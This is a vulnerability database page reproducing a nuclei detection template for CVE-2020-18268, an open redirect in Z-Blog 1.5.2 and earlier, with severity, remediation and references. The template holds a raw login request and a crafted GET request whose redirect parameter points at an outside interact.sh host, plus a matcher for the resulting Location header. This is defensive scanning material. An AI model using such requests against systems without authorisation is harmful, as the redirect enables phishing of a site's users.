Lucene search
K

Z-Blog <=1.5.2 - Open Redirect

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 79 Views

Z-Blog 1.5.2 open redirect via redirect parameter in cmd.php can lead to phishing attacks or further exploits. Upgrade to v1.5.

Related
Refs
Code
id: CVE-2020-18268

info:
  name: Z-Blog <=1.5.2 - Open Redirect
  author: 0x_Akoko
  severity: medium
  description: Z-Blog 1.5.2 and earlier contains an open redirect vulnerability via the redirect parameter in zb_system/cmd.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the execution of further attacks.
  remediation: |
    Upgrade Z-Blog to version 1.5.3 or later to fix the open redirect vulnerability.
  reference:
    - https://github.com/zblogcn/zblogphp/issues/216
    - https://github.com/zblogcn/zblogphp/issues/209
    - https://nvd.nist.gov/vuln/detail/CVE-2020-18268
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-18268
    cwe-id: CWE-601
    epss-score: 0.02687
    epss-percentile: 0.84052
    cpe: cpe:2.3:a:zblogcn:z-blogphp:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: zblogcn
    product: z-blogphp
  tags: cve,cve2020,redirect,zblogphp,authenticated,zblogcn,vuln

http:
  - raw:
      - |
        POST /zb_system/cmd.php?act=verify HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 81
        Content-Type: application/x-www-form-urlencoded
        Connection: close

        btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0
      - |
        GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
# digest: 490a0046304402203a1da368d596850e95ccc93566d7144ecf29a22678f1f83996dc82705f6f24cd02205deb5cb4dac22e66756bdaba400e4fd37c1a13cd4ced476c8e3748a794ebe3c2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 25.8
CVSS 3.16.1
EPSS0.02687
79